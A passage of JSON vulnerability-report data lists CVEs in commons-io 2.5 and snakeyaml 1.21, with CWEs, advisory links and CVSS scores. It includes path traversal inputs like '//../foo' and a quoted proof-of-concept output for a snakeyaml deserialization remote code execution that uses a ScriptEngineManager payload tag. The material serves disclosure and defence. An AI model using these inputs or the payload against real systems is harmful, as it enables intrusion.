,"cve":"CVE-2021-29425","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-04-26T16:04:00","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2021-29425"},{"system_name":"Apache Advisory","text":"IO-556"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0004"}],"notes":[{"audience":"developers","category":"other","text":"Improper Limitation of a Pathname to a Restricted Directory","title":"Additional CWE: 22"},{"category":"description","details":"Vulnerability 
Description","text":"Path Traversal and Improper Input Validation in Apache Commons IO"},{"category":"details","details":"Vulnerability Details","text":"# Path Traversal and Improper Input Validation in Apache Commons IO In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value."}],"product_status":{"known_affected":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"],"known_not_affected":["commons-io/commons-io@2.7"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Apache Advisory IO-556","url":"https://issues.apache.org/jira/browse/IO-556"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"NetApp Advisory ntap-20220210-0004","url":"https://security.netapp.com/advisory/ntap-20220210-0004"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"]}],"title":"CVE-2021-29425/pkg:maven/commons-io/commons-io@2.5?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25857"]}],"cve":"CVE-2022-25857","cwe":{"id":"400","name":"Uncontrolled Resource 
Consumption"},"discovery_date":"2022-08-31T00:00:24","ids":[{"system_name":"CVE Record","text":"CVE-2022-25857"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGYAML-2806360"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in snakeyaml"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in snakeyaml The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"},{"summary":"Snyk Advisory 
SNYK-JAVA-ORGYAML-2806360","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-25857/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38751"]}],"cve":"CVE-2022-38751","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38751"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38751/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38752"]}],"cve":"CVE-2022-38752","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38752"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp 
Advisory","text":"ntap-20240315-0009"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"],"known_not_affected":["org.yaml/snakeyaml@1.32"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory 
ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-38752/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38749"]}],"cve":"CVE-2022-38749","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2022-38749"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38749/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38750"]}],"cve":"CVE-2022-38750","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38750"},{"system_name":"Gentoo 
Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory 
ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38750/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"cve":"CVE-2022-1471","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-12T21:19:47","ids":[{"system_name":"CVE Record","text":"CVE-2022-1471"},{"system_name":"GitHub Advisory","text":"GHSA-mjmj-j48q-9wg2"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0015"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"SnakeYaml Constructor Deserialization Remote Code Execution"},{"category":"details","details":"Vulnerability Details","text":"# SnakeYaml Constructor Deserialization Remote Code Execution ### Summary SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type be deserialized given the following line: new Yaml(new Constructor(TestDataClass.class)).load(yamlContent); Types do not have to match the types of properties in the target class. 
A `ConstructorException` is thrown, but only after a malicious payload is deserialized. ### Severity High, lack of type checks during deserialization allows remote code execution. ### Proof of Concept Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs a http request to http://127.0.0.1:8000. Example output of successful run of proof of concept: ``` $ bash run.sh [+] Downloading snakeyaml if needed [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE nc: no process found [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server. [+] An exception is expected. Exception: Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0 in 'string', line 1, column 1: payload: !!javax.script.ScriptEn ... ^ Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager in 'string', line 1, column 10: payload: !!javax.script.ScriptEngineManag ... 
^ at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172) at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220) at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174) at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158) at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491) at org.yaml.snakeyaml.Yaml.load(Yaml.java:416) at Main.main(Main.java:37) Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167) at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171) at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81) at java.base/java.lang.reflect.Field.set(Field.java:780) at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286) ... 9 more [+] Dumping Received HTTP Request. Will not be empty if PoC worked GET /proof-of-concept HTTP/1.1 User-Agent: Java/11.0.14 Host: localhost:8000 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive ``` ### Further Analysis Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content. 
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject. A fix was released in version 2.0. See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314 for more information. ### Timeline **Date reported**: 4/11/2022 **Date fixed**: **Date disclosed**: 10/13/2022"}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/19/1"},{"summary":"GitHub Advisory GHSA-mjmj-j48q-9wg2","url":"https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"NetApp Advisory ntap-20230818-0015","url":"https://security.netapp.com/advisory/ntap-20230818-0015"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Cve 
2022","url":"https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":8.3,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.3,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.3,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]}],"title":"CVE-2022-1471/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41854"]}],"cve":"CVE-2022-41854","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-11-11T19:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-41854"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability 